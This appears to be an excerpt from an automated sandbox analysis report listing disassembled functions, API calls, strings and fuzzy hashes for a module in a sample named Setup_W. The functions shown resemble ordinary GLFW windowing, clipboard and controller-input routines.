                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ChangeConditionFilterMaskMessage$CreateDisplayEnumLongPlacementRectSettings$AcceptAdjustAttributesDeleteDragFilesHandleInfoLayeredModuleObjectPropVerifyVersionfree
                                                                                                • String ID: ,$I$`
                                                                                                • API String ID: 131436255-777141184
                                                                                                • Opcode ID: 0cb9c5bf2eeb64f56a6cd0c7beb129aca32bfc4b4948cbd305c90c412df7d815
                                                                                                • Instruction ID: 4fcba12949c450f94256104e9e972d34c8d011c993fabe472bf4f4fe60441ba9
                                                                                                • Opcode Fuzzy Hash: 0cb9c5bf2eeb64f56a6cd0c7beb129aca32bfc4b4948cbd305c90c412df7d815
                                                                                                • Instruction Fuzzy Hash: 9FD1B0B4A083059FEB04EFA9C68479EBBF4FF89704F00C829E8999B245D7759845CF52

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 202 6460998c-6460999d 203 64609a10-64609a17 202->203 204 6460999f 202->204 205 64609b07-64609b0d 203->205 206 64609a1d-64609a3f 203->206 207 646099a1-646099a8 204->207 210 64609a45-64609a4a 206->210 208 646099aa-646099b1 207->208 209 646099bb-646099c3 207->209 208->209 211 646099b3-646099b9 208->211 209->207 212 646099c5-64609a78 209->212 210->205 213 64609a50-64609a64 call 64602ef4 210->213 211->209 214 64609a0a-64609a0e 211->214 218 64609a81-64609a86 212->218 213->205 214->203 214->204 218->214 219 64609a88-64609aa9 sprintf 218->219 220 64609af3 219->220 221 64609aab-64609aae 219->221 227 64609afd 220->227 221->220 222 64609ad3-64609ad8 221->222 223 64609ab5-64609aba 221->223 224 64609ac9-64609ace 221->224 225 646099ca 221->225 226 64609add-64609aeb 221->226 221->227 228 64609abf-64609ac4 221->228 229 646099cf-646099f5 call 646036a2 222->229 223->229 224->229 225->229 226->220 227->205 228->229 229->214 232 646099f7-64609a05 call 646035ef 229->232 232->214
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: sprintf
                                                                                                • String ID: Unknown XInput Device$Wireless Xbox Controller$XInput Arcade Stick$XInput Dance Pad$XInput Drum Kit$XInput Flight Stick$XInput Guitar$XInput Wheel$Xbox Controller
                                                                                                • API String ID: 590974362-1077793288
                                                                                                • Opcode ID: d513b2141bc3ad312d71be5418f76d33285190a4b7cae771f26ec3d63cd6f96f
                                                                                                • Instruction ID: 804f39a0cce51d99c337eb1727c2d52fc43592905ec737388b680bb4227ce87a
                                                                                                • Opcode Fuzzy Hash: d513b2141bc3ad312d71be5418f76d33285190a4b7cae771f26ec3d63cd6f96f
                                                                                                • Instruction Fuzzy Hash: 61313AB0A0C394DFD709AF69C68439ABFE2EB51B4CF05D82DE4949B284D775C488CB42

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0cd$$0cd$@0ad$@Jcd$`0ad
                                                                                                • API String ID: 0-1914348268
                                                                                                • Opcode ID: 1bd3d9c5e908754d6cf1e74d1230158fa814d11c3498cb25bf0402f2b0ec90f1
                                                                                                • Instruction ID: 9be3b192a5a6e4199c112d2803d7f13388fb0735954f6ca832e5783398968a45
                                                                                                • Opcode Fuzzy Hash: 1bd3d9c5e908754d6cf1e74d1230158fa814d11c3498cb25bf0402f2b0ec90f1
                                                                                                • Instruction Fuzzy Hash: 4311866160839087FB09AF66C74071AB598AB62A56F05D03DD9458BB40EB72C8C4C757

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 260 6460bc57-6460bc65 261 6460bc67-6460bc69 call 6460b80c 260->261 262 6460bc6e-6460bc76 260->262 261->262 264 6460bc78 262->264 265 6460bc7d-6460bc83 262->265 264->265 266 6460bc85 265->266 267 6460bc8f-6460bc97 265->267 266->267 268 6460bcc6-6460bcce 267->268 269 6460bc99-6460bcbc RemovePropW DestroyWindow 267->269 270 6460bcd0-6460bcd9 DestroyIcon 268->270 271 6460bcda-6460bce2 268->271 269->268 270->271 272 6460bce4-6460bced DestroyIcon 271->272 273 6460bcee-6460bcf2 271->273 272->273
                                                                                                APIs
                                                                                                • RemovePropW.USER32 ref: 6460BCA4
                                                                                                • DestroyWindow.USER32 ref: 6460BCB5
                                                                                                • DestroyIcon.USER32(?,?,?,?,6460EC4B,00000001,64633B20,?,64602D7A), ref: 6460BCD3
                                                                                                • DestroyIcon.USER32(?,?,?,?,6460EC4B,00000001,64633B20,?,64602D7A), ref: 6460BCE7
                                                                                                  • Part of subcall function 6460B80C: SetThreadExecutionState.KERNEL32 ref: 6460B82C
                                                                                                  • Part of subcall function 6460B80C: SystemParametersInfoW.USER32 ref: 6460B873
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$Icon$ExecutionInfoParametersPropRemoveStateSystemThreadWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1815938153-0
                                                                                                • Opcode ID: d7b234f1f98a1b0dd1aaf22ca65479dfced2ab44939d0e5755922a7d14ec9752
                                                                                                • Instruction ID: ef17fc05eb6e287ab9b56e4bfc9850124767209affbb755ce7ea69302aa2200f
                                                                                                • Opcode Fuzzy Hash: d7b234f1f98a1b0dd1aaf22ca65479dfced2ab44939d0e5755922a7d14ec9752
                                                                                                • Instruction Fuzzy Hash: 981109B0208245DFDF55AFA5C9C8B597BE8EF05A41F00987CE895CB246DB74D440CB21

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 274 6460ec78-6460ec8b 275 6460ecaa-6460ecac 274->275 276 6460ec8d-6460ec9d 274->276 277 6460eccb-6460eccf 275->277 278 6460ecae-6460ecbe 275->278 276->275 279 6460ecd1-6460ece1 277->279 280 6460ecee-6460ecf5 277->280 278->277 279->280 281 6460ecf7-6460ed0b call 64602ef4 280->281 282 6460ed0d-6460ed0f 280->282 289 6460ed36-6460ed38 281->289 284 6460ed11-6460ed15 282->284 285 6460ed17-6460ed31 call 64602ef4 282->285 284->285 287 6460ed3d-6460eda5 call 64601440 284->287 285->289 291 6460eee3-6460eeef 287->291 293 6460edab-6460ee79 calloc call 6460c519 287->293 289->291 295 6460ee7e-6460ee80 293->295 296 6460ee82-6460ee89 295->296 297 6460ee9b-6460eea3 glfwDestroyWindow 295->297 298 6460eea8-6460eeac 296->298 299 6460ee8b-6460ee99 call 64601b16 296->299 297->289 301 6460eec1-6460eec8 298->301 302 6460eeae-6460eeb5 298->302 299->297 299->298 301->291 305 6460eeca-6460eed9 call 6460c46e 301->305 302->291 304 6460eeb7-6460eebf call 646037ac 302->304 304->291 305->291 310 6460eedb-6460eede call 6460c4da 305->310 310->291
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow.callocglfw
                                                                                                • String ID: 00cd
                                                                                                • API String ID: 443364576-4044054280
                                                                                                • Opcode ID: 07d9f19076beabb2907ae6ff3bec3432acb4300f844c70ff2a8576bc708936d2
                                                                                                • Instruction ID: dd3ab8de1e64792acb9e15d1505939a65c139ece9168a58cb7d13142409f8cd5
                                                                                                • Opcode Fuzzy Hash: 07d9f19076beabb2907ae6ff3bec3432acb4300f844c70ff2a8576bc708936d2
                                                                                                • Instruction Fuzzy Hash: D16117B0904B648FE726DF19C68438ABBF4FF45B14F00895EE89997790D375AA80CF42

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 312 6460ebe8-6460ebfa 313 6460ec12-6460ec14 312->313 314 6460ebfc-6460ec10 call 64602ef4 312->314 316 6460ec71-6460ec77 313->316 317 6460ec16-6460ec35 call 6460ad78 313->317 314->316 321 6460ec43-6460ec46 call 6460bc57 317->321 322 6460ec37-6460ec3e glfwMakeContextCurrent 317->322 324 6460ec4b-6460ec50 321->324 322->321 325 6460ec55-6460ec57 324->325 326 6460ec59-6460ec5d 325->326 327 6460ec5f-6460ec6b 325->327 326->325 327->316
                                                                                                APIs
                                                                                                • glfwMakeContextCurrent.GLFW.4281411633(00000001,64633B20,?,64602D7A,?,?,00000001,64613040,64633024,?,646030E9), ref: 6460EC3E
                                                                                                  • Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextCurrent.Makecallocglfwstrcpy
                                                                                                • String ID: 3cd
                                                                                                • API String ID: 1788468011-159238042
                                                                                                • Opcode ID: 2304726388e96dead50c1d61f080e64d457ad7172f610e80862ece414da8d9a7
                                                                                                • Instruction ID: 03198bbc303c97b6376e433ddd5c4f80c2fcef52d2c33b9efc15072323d32dc3
                                                                                                • Opcode Fuzzy Hash: 2304726388e96dead50c1d61f080e64d457ad7172f610e80862ece414da8d9a7
                                                                                                • Instruction Fuzzy Hash: E801F7B17083408FE709AF58C2C039977E1EB55B19F00C46AD9A88F341D77788C19797

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 328 64609b0e-64609b15 329 64609b76 328->329 330 64609b17-64609b52 GetModuleHandleW 328->330 329->329 331 64609b57-64609b5c 330->331 332 64609b72-64609b75 331->332 333 64609b5e-64609b6d call 64602ef4 331->333 332->329 333->332
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,64633B3C,?,64608F89), ref: 64609B2B
                                                                                                  • Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModulecallocstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 201297998-0
                                                                                                • Opcode ID: fd2d56a074e933bbdbfcf0366e7dd8147be3146eb1afee0157ecf2b77bf12438
                                                                                                • Instruction ID: 45fb95450c7f613d8c139586dc322b620b14055cfca3123252664d532c9aa62d
                                                                                                • Opcode Fuzzy Hash: fd2d56a074e933bbdbfcf0366e7dd8147be3146eb1afee0157ecf2b77bf12438
                                                                                                • Instruction Fuzzy Hash: F1F034B0508381DBDB06AF26D24978BBBE4EB55B88F00D91CE4D507240D3B5C488CB62
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 6460E3DA
                                                                                                • GetClipboardData.USER32 ref: 6460E402
                                                                                                • CloseClipboard.USER32 ref: 6460E429
                                                                                                  • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                                                  • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                                                  • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$ByteCharCloseDataErrorFormatLastMessageMultiOpenWide
                                                                                                • String ID: ?!cd
                                                                                                • API String ID: 3814655098-3029108249
                                                                                                • Opcode ID: 3e00b10a35443fd6316c3cfce3fa4d2224ac93d0c0fa08c9f8415aeea459148c
                                                                                                • Instruction ID: 1e3a5640424b765a1ace3aa08e8c3faaab073590e9099d1ebd5dcc15657c0ed4
                                                                                                • Opcode Fuzzy Hash: 3e00b10a35443fd6316c3cfce3fa4d2224ac93d0c0fa08c9f8415aeea459148c
                                                                                                • Instruction Fuzzy Hash: F7216DB060C350DBD7167FA9CA8479EBBE8FB56B55F01942CE5C5C3200D7B498848BA7
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32 ref: 6460E2F4
                                                                                                • GlobalLock.KERNEL32 ref: 6460E31E
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6460E392
                                                                                                  • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                                                  • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                                                  • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocByteCharErrorFormatFreeLastLockMessageMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 3453243994-0
                                                                                                • Opcode ID: 73381ce7e260493f79de8631a67482dc099fa0e6a5317d035ac0943809c6ed9a
                                                                                                • Instruction ID: 1af1f2522bf29651f8543d3c7fd93ad5ccf7bd5a95a5199db3afa89fa8dc33f2
                                                                                                • Opcode Fuzzy Hash: 73381ce7e260493f79de8631a67482dc099fa0e6a5317d035ac0943809c6ed9a
                                                                                                • Instruction Fuzzy Hash: 85416AB0508341EFDB05AF6ACA4839EBFF4FB45761F00C92DE8888B240D3748484CBA2
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID:
                                                                                                • API String ID: 1649606143-0
                                                                                                • Opcode ID: 847e3df588da540dcf1b59635b2408ac9f6daf5b5d297e9ac9d3c2577dec495a
                                                                                                • Instruction ID: 864026d1cb7c078cbe1523b34db08e4da42a9e532c9b22f97af7a2e5f9ad4f50
                                                                                                • Opcode Fuzzy Hash: 847e3df588da540dcf1b59635b2408ac9f6daf5b5d297e9ac9d3c2577dec495a
                                                                                                • Instruction Fuzzy Hash: EC0167B59043595EEB247BDACD447AFBEB8DF41BA4F41842EDAD413241C7B91040DAB2
                                                                                                APIs
                                                                                                • GetSystemTimeAsFileTime.KERNEL32 ref: 6461056F
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,646013E5), ref: 64610580
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 64610588
                                                                                                • GetTickCount.KERNEL32 ref: 64610590
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,646013E5), ref: 6461059F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                • String ID:
                                                                                                • API String ID: 1445889803-0
                                                                                                • Opcode ID: a903fcd543008832f528e1bd1313952d38995f44d5e3bb289cbb4e52cc730063
                                                                                                • Instruction ID: 4098e1f792661b811c022bcd4256120fdc6bdbc12b5fdcfa95f35455c30f3de0
                                                                                                • Opcode Fuzzy Hash: a903fcd543008832f528e1bd1313952d38995f44d5e3bb289cbb4e52cc730063
                                                                                                • Instruction Fuzzy Hash: AC11A3B150C3408FDB10EF7AD58854BBBE4FB8A251F00583AE845C7B10EA30D498C782
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 6461063F
                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 6461064F
                                                                                                • GetCurrentProcess.KERNEL32 ref: 64610658
                                                                                                • TerminateProcess.KERNEL32 ref: 64610669
                                                                                                • abort.MSVCRT ref: 64610672
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                • String ID:
                                                                                                • API String ID: 520269711-0
                                                                                                • Opcode ID: 8e68a6bfe9dddbc9460aaad5130a9c4fb207ff0a5dea586c87432d2b2070cb2e
                                                                                                • Instruction ID: 48baf10372db0d9f919d5919cdc0d0d1cbca1b7c8996cf0b71dbba256961bdc2
                                                                                                • Opcode Fuzzy Hash: 8e68a6bfe9dddbc9460aaad5130a9c4fb207ff0a5dea586c87432d2b2070cb2e
                                                                                                • Instruction Fuzzy Hash: 201116B5908344CFEB11EF6EC14464ABBF0FB8A305F44952DE88897310E775A954CF92
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 6461063F
                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 6461064F
                                                                                                • GetCurrentProcess.KERNEL32 ref: 64610658
                                                                                                • TerminateProcess.KERNEL32 ref: 64610669
                                                                                                • abort.MSVCRT ref: 64610672
                                                                                                Memory Dump Source
